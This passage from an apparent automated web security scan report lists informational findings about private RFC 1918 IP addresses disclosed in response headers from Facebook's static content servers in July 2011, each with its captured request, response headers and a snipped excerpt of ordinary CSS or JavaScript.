Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 02 Mar 2011 18:00:53 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Content-Length: 1995
Vary: Accept-Encoding
Cache-Control: public, max-age=30931966
Expires: Wed, 11 Jul 2012 15:10:34 GMT
Date: Tue, 19 Jul 2011 14:57:48 GMT
Connection: close

/*1310483442,169775812*/

if (window.CavalryLogger) { CavalryLogger.start_js(["waIbv"]); }

function BakerAction(a,b){this.accountId=a;this.eventName=b;this.data={};this.shouldSendToOmniture=true;this
...[SNIP]...

24.88. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/JtYPs2Da_dw.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yW/r/JtYPs2Da_dw.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yW/r/JtYPs2Da_dw.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Sat, 09 Jul 2011 20:43:47 GMT
X-FB-Server: 10.30.148.193
X-Cnection: close
Content-Length: 4952
Vary: Accept-Encoding
Cache-Control: public, max-age=30803419
Expires: Tue, 10 Jul 2012 03:28:12 GMT
Date: Tue, 19 Jul 2011 14:57:53 GMT
Connection: close

/*1310354873,169776321*/

.fbEmu .body .fbEmuLink{color:#333}
.fbEmu .body .fbEmuLink:hover{text-decoration:none}
.fbEmu .body a.signature{color:#3b5998;display:inline}
.fbEmu .body a.signature:hover{
...[SNIP]...

24.89. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/NE1qNsIIHmi.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yX/r/NE1qNsIIHmi.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yX/r/NE1qNsIIHmi.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:02:29 GMT
X-FB-Server: 10.30.147.197
X-Cnection: close
Content-Length: 25243
Vary: Accept-Encoding
Cache-Control: public, max-age=30830132
Expires: Tue, 10 Jul 2012 10:54:12 GMT
Date: Tue, 19 Jul 2011 14:58:40 GMT
Connection: close

/*1310381647,169776069*/

.UIProfileBox_Box{padding-bottom:15px;position:relative;overflow:hidden}
.UIProfileBox_Header{background:#eceff5;border-top:1px solid #94a3c4;margin:0;padding:5px 8px;positio
...[SNIP]...

24.90. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/PPCATkRjgbb.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yX/r/PPCATkRjgbb.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yX/r/PPCATkRjgbb.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 01:50:38 GMT
X-FB-Server: 10.138.69.182
Vary: Accept-Encoding
Content-Length: 564
Cache-Control: public, max-age=30805348
Expires: Tue, 10 Jul 2012 04:00:45 GMT
Date: Tue, 19 Jul 2011 14:58:17 GMT
Connection: close

/*1310356854,176833974*/

.sp_21652l{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zP/r/AJUJoXUvn8A.png);background-repeat:no-repeat;display:inline-block;height:16px;width:31px}
.sx_ddf7
...[SNIP]...

24.91. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/sz5xc1yg7bR.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yX/r/sz5xc1yg7bR.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yX/r/sz5xc1yg7bR.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 30 Jun 2011 21:13:24 GMT
X-FB-Server: 10.30.146.195
X-Cnection: close
Content-Length: 17269
Vary: Accept-Encoding
Cache-Control: public, max-age=30212544
Expires: Tue, 03 Jul 2012 07:19:56 GMT
Date: Tue, 19 Jul 2011 14:57:32 GMT
Connection: close

/*1309764038,169775811*/

if (window.CavalryLogger) { CavalryLogger.start_js(["CEpz8"]); }

function CIBase(a,b){copy_properties(this,{ci_config:a,element_ids:b});return this;}copy_properties(CIBase.p
...[SNIP]...

24.92. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/7lH5BC-8hlS.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y_/r/7lH5BC-8hlS.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y_/r/7lH5BC-8hlS.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:19:03 GMT
X-FB-Server: 10.30.145.198
X-Cnection: close
Content-Length: 14698
Vary: Accept-Encoding
Cache-Control: public, max-age=30228983
Expires: Tue, 03 Jul 2012 11:53:37 GMT
Date: Tue, 19 Jul 2011 14:57:14 GMT
Connection: close

/*1309780519,169775558*/

.UIContentTopper{padding:14px 0 0 17px;margin:50px auto 15px auto;border-top:2px solid #d3dae6}
.UIContentTopper_footer{width:578px;margin:5px auto 0 auto;font-size: 9px}
.UI
...[SNIP]...

24.93. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/FmBZt5UgnLN.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y_/r/FmBZt5UgnLN.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y_/r/FmBZt5UgnLN.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 20 Jun 2011 02:28:33 GMT
X-FB-Server: 10.138.17.182
Content-Length: 4895
Vary: Accept-Encoding
Cache-Control: public, max-age=28987444
Expires: Tue, 19 Jun 2012 03:01:57 GMT
Date: Tue, 19 Jul 2011 14:57:53 GMT
Connection: close

/*1308538945,176820662*/

if (window.CavalryLogger) { CavalryLogger.start_js(["YfjjU"]); }

function Flash(){}copy_properties(Flash,{INIT:'flash/init',READY:'flash/ready',FAILED:'flash/failed'});
add_
...[SNIP]...

24.94. http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/zpzCcjhbyCZ.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/ya/r/zpzCcjhbyCZ.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/ya/r/zpzCcjhbyCZ.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 10 Jun 2011 05:08:45 GMT
X-FB-Server: 10.138.17.182
Content-Length: 1414
Vary: Accept-Encoding
Cache-Control: public, max-age=28166483
Expires: Sat, 09 Jun 2012 15:00:07 GMT
Date: Tue, 19 Jul 2011 14:58:44 GMT
Connection: close

/*1307717969,176820662*/

div.fbGearMenu .uiCloseButton{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zL/r/Rfeox6F2wdM.png);height:16px;width:16px}
div.fbGearMenu .uiCloseButton:hover,di
...[SNIP]...

24.95. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/DZLa1PZIieN.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yc/r/DZLa1PZIieN.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yc/r/DZLa1PZIieN.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 17 Mar 2011 21:12:50 GMT
X-FB-Server: 10.138.16.181
Vary: Accept-Encoding
Content-Length: 917
Cache-Control: public, max-age=27372658
Expires: Thu, 31 May 2012 10:29:40 GMT
Date: Tue, 19 Jul 2011 14:58:42 GMT
Connection: close

/*1306924185,176820405*/

.fbxphotos td{padding-left:8px}
.fbxphotos td:first-child{padding-left:0}
.fbxphotos .mediaDetails{margin:2px 0 16px;width:124px;word-wrap:break-word}
.fbxphotos .mediaDetail
...[SNIP]...

24.96. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/NGblq-c7mGZ.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yc/r/NGblq-c7mGZ.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yc/r/NGblq-c7mGZ.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 01:57:23 GMT
X-FB-Server: 10.138.64.183
Vary: Accept-Encoding
Content-Length: 524
Cache-Control: public, max-age=30206950
Expires: Tue, 03 Jul 2012 05:47:50 GMT
Date: Tue, 19 Jul 2011 14:58:40 GMT
Connection: close

/*1309758316,176832695*/

.sp_3dt220{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zU/r/VztO43HEGrK.png);background-repeat:no-repeat;display:inline-block;height:39px;width:10px}
.sx_8893
...[SNIP]...

24.97. http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/K_RxgTvVokq.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/ye/r/K_RxgTvVokq.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/ye/r/K_RxgTvVokq.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 20 Jun 2011 02:32:45 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Content-Length: 8291
Vary: Accept-Encoding
Cache-Control: public, max-age=29004410
Expires: Tue, 19 Jun 2012 07:44:18 GMT
Date: Tue, 19 Jul 2011 14:57:28 GMT
Connection: close

/*1308555823,169776318*/

body.contact_importer{background-color:transparent}
div.file_help{padding:10px;display:none;border:1px solid #ccc;background:#fcfcfc;margin-top:6px;margin-bottom:6px}
.fh_tit
...[SNIP]...

24.98. http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/edfMk-9nmKj.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/ye/r/edfMk-9nmKj.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/ye/r/edfMk-9nmKj.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 01 Jul 2011 21:15:27 GMT
X-FB-Server: 10.138.64.184
Vary: Accept-Encoding
Content-Length: 339
Cache-Control: public, max-age=30004398
Expires: Sat, 30 Jun 2012 21:32:03 GMT
Date: Tue, 19 Jul 2011 14:58:45 GMT
Connection: close

/*1309555892,176832696*/

.sp_3quq0w{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zv/r/FSZkwj9K5XP.png);background-repeat:no-repeat;display:inline-block;height:56px;width:63px}
.sx_c846
...[SNIP]...

24.99. http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/uYvCnbsceoH.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yh/r/uYvCnbsceoH.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yh/r/uYvCnbsceoH.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 01:57:23 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 464
Cache-Control: public, max-age=30197490
Expires: Tue, 03 Jul 2012 03:09:11 GMT
Date: Tue, 19 Jul 2011 14:57:41 GMT
Connection: close

/*1309748911,169775812*/

.sp_4w38az{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zz/r/z1xzUcShxUD.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_c2fd
...[SNIP]...

24.100. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/4Ese_3T2rw0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yi/r/4Ese_3T2rw0.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yi/r/4Ese_3T2rw0.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 29 Mar 2011 00:35:21 GMT
X-FB-Server: 10.30.148.191
X-Cnection: close
Content-Length: 3354
Vary: Accept-Encoding
Cache-Control: public, max-age=21808487
Expires: Wed, 28 Mar 2012 00:52:19 GMT
Date: Tue, 19 Jul 2011 14:57:32 GMT
Connection: close

/*1301360019,169776319*/

if (window.CavalryLogger) { CavalryLogger.start_js(["4s+Ia"]); }

var MobileService={form:null,mode:'register',mobileError:function(b){if(!this.form)return;var a=b.getPayload
...[SNIP]...

24.101. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/erCj3jAAsca.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yi/r/erCj3jAAsca.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yi/r/erCj3jAAsca.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:54:25 GMT
X-FB-Server: 10.138.69.184
Content-Length: 2863
Vary: Accept-Encoding
Cache-Control: public, max-age=29594320
Expires: Tue, 26 Jun 2012 03:37:23 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1309145884,176833976*/

.set_as_homepage_img{float:left;width:40px}
#set_as_homepage_birthday_box{margin-top:2px;border-bottom:solid 1px #d8dfea;border-top:solid 1px #d8dfea}
#set_as_homepage_body_b
...[SNIP]...

24.102. http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/6gpjXzvXDSF.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yl/r/6gpjXzvXDSF.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yl/r/6gpjXzvXDSF.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 13 Jul 2011 19:28:30 GMT
X-FB-Server: 10.138.69.185
Content-Length: 18851
Vary: Accept-Encoding
Cache-Control: public, max-age=31034510
Expires: Thu, 12 Jul 2012 19:39:31 GMT
Date: Tue, 19 Jul 2011 14:57:41 GMT
Connection: close

/*1310585938,176833977*/

button.async_saving .default_message,
a.async_saving .default_message,
form.async_saving .default_message,
.saving_message{display:none}
.default_message,
button.async_saving
...[SNIP]...

24.103. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/DiI7ZwzsMWE.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/ym/r/DiI7ZwzsMWE.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/ym/r/DiI7ZwzsMWE.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 05 Jul 2011 02:23:52 GMT
X-FB-Server: 10.30.145.195
X-Cnection: close
Content-Length: 5877
Vary: Accept-Encoding
Cache-Control: public, max-age=30292214
Expires: Wed, 04 Jul 2012 05:28:58 GMT
Date: Tue, 19 Jul 2011 14:58:44 GMT
Connection: close

/*1309843681,169775555*/

div.photosClusters{width:602px}
.photosClusters .photoAndTypeahead{float:left;width:174px}
.photosClusters .faceCrop{background:#fff;border:1px solid #ccc;position:relative;p
...[SNIP]...

24.104. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/IOfrcReUvwR.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/ym/r/IOfrcReUvwR.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/ym/r/IOfrcReUvwR.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/pages/create.php?ref_type=sitefooter
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 14 Jul 2011 21:30:40 GMT
X-FB-Server: 10.30.145.197
X-Cnection: close
Content-Length: 50836
Vary: Accept-Encoding
Cache-Control: public, max-age=31128098
Expires: Fri, 13 Jul 2012 21:39:29 GMT
Date: Tue, 19 Jul 2011 14:57:51 GMT
Connection: close

/*1310679578,169775557*/

if (window.CavalryLogger) { CavalryLogger.start_js(["Dy65U"]); }

var NotificationCounter=(function(){var a={messages:0,notifications:0,requests:0};return {init:function(){Ar
...[SNIP]...

24.105. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/OFPuB9qmfib.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/ym/r/OFPuB9qmfib.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/ym/r/OFPuB9qmfib.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:06:52 GMT
X-FB-Server: 10.30.147.196
X-Cnection: close
Content-Length: 2726
Vary: Accept-Encoding
Cache-Control: public, max-age=30853805
Expires: Tue, 10 Jul 2012 17:27:33 GMT
Date: Tue, 19 Jul 2011 14:57:28 GMT
Connection: close

/*1310405258,169776068*/

.ego_contact_importer .contact_importer_widget .ci_submit_container
.ci_submit_button{float:none}
.ego_contact_importer .contact_importer_widget .ci_submit_container
.ci_ego_
...[SNIP]...

24.106. http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/nfbcyOQNzob.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yn/r/nfbcyOQNzob.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yn/r/nfbcyOQNzob.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 16 Mar 2010 21:10:31 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.147.196
X-Cnection: close
Content-Length: 2876
Vary: Accept-Encoding
Cache-Control: public, max-age=20783512
Expires: Fri, 16 Mar 2012 04:09:48 GMT
Date: Tue, 19 Jul 2011 14:57:56 GMT
Connection: close

/*1300335031,169776068*/

if (window.CavalryLogger) { CavalryLogger.start_js(["ZtuLL"]); }

function EmuController(a,d,b,c){this.impression=d;this.context=b;this.flags=c;this.containerId=a;DataStore.s
...[SNIP]...

24.107. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/Rgx_Vz7nSNo.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yo/r/Rgx_Vz7nSNo.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yo/r/Rgx_Vz7nSNo.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:03:37 GMT
X-FB-Server: 10.138.64.185
Content-Length: 1730
Vary: Accept-Encoding
Cache-Control: public, max-age=30805826
Expires: Tue, 10 Jul 2012 04:09:08 GMT
Date: Tue, 19 Jul 2011 14:58:42 GMT
Connection: close

/*1310357278,176832697*/

div#pagelet_app_stories .loadingIndicator{display:none;text-align:center}
